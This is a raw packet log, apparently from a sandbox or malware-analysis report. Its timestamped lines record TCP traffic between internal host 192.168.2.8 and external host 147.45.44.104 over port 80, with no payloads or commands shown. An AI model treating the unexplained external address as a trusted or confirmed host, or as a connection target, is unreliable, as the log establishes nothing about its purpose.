                                                                              Oct 8, 2024 03:23:05.298367977 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298381090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298389912 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298418999 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298424006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298433065 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298446894 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298455954 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298464060 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298472881 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298482895 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.299072027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300497055 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300508022 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300523043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300539970 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300568104 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300575972 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300580025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300595045 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300612926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300622940 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300636053 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300661087 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.301887989 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.301929951 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.301966906 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.301975012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.301996946 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302005053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302006960 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302023888 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302032948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302045107 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302050114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302073002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302814007 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302825928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302841902 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648457050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648468971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648487091 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648493052 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648498058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648516893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648525000 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648529053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648549080 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648551941 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648582935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648732901 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648745060 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648762941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648772955 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648780107 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648792028 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648802996 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648816109 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648817062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648837090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648845911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648853064 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648864985 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648880005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648895025 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648900032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648905039 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648911953 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648926973 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648931980 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648948908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648976088 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649049044 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649060011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649076939 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649086952 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649092913 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649106979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649116993 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649122953 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649142027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649199963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649213076 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649223089 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649236917 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649240971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649256945 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649257898 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649276018 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649286032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649291039 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649310112 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649321079 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649322033 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649339914 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649350882 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649353981 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649368048 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649378061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649382114 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649398088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649408102 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649413109 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649429083 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649441004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649442911 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649462938 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649471998 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649477959 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649493933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649503946 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649504900 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649523020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649533033 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649538040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649553061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649561882 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649565935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.649581909 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.649596930 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650022984 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650033951 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650052071 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650068045 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650074959 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650087118 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650088072 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650105000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650115967 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650125027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650132895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650141954 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650156975 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650166988 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650171041 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650180101 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650197029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650208950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650222063 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650223970 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650242090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650243998 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650254011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650269032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650276899 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650290012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650300026 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650311947 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650319099 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650326967 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650330067 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650352001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650362015 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650372982 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650379896 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650391102 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650398016 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650413036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650423050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650429010 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650441885 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650451899 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650460005 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650471926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650480986 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650491953 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650499105 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650506973 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650510073 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650528908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650541067 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650556087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650563002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650588036 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650783062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650794983 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650821924 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650933981 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650959969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650970936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.650979996 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.650990963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651000977 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651004076 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651021004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651031017 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651041031 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651047945 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651065111 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651071072 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651096106 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651107073 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651108027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651124001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651144028 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651144981 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651160002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651175976 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651180029 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651191950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651206970 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651210070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651217937 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651231050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651242971 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651247025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651256084 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651256084 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651273966 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651283026 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651298046 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651298046 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651309013 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651323080 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651323080 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651334047 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651348114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651350021 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651357889 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651372910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651376963 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651392937 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651400089 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651417971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651428938 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651429892 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651444912 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651457071 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.651810884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651820898 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651839972 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.651849031 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656455994 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656471968 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656481981 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656488895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656500101 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656513929 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656514883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656532049 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656542063 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656542063 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656559944 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656565905 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656572104 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656589031 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656614065 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656621933 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656651020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656665087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656682014 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656701088 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656797886 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656809092 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656825066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656835079 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656848907 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656852961 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656867027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656873941 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656883001 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656888962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656900883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656917095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.656924009 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.656949997 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.659352064 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659360886 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659379005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659399033 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.659420013 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659430027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659446955 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659457922 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.659483910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659486055 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.659495115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.659533978 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.698291063 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698302984 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698322058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698332071 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698344946 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.698369980 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.698401928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698441982 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698452950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698470116 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.698477983 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.698503017 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.722208023 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722264051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722271919 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722285986 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722297907 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.722302914 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722316027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722323895 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.722331047 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722346067 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.722347021 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.722384930 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.725610971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725630999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725641966 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725657940 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725666046 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.725671053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725692987 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.725703001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725713968 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725729942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.725738049 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.725761890 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730483055 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730492115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730509996 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730529070 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730529070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730542898 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730557919 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730570078 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730578899 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730583906 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730607033 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730616093 CEST4970680192.168.2.8147.45.44.104
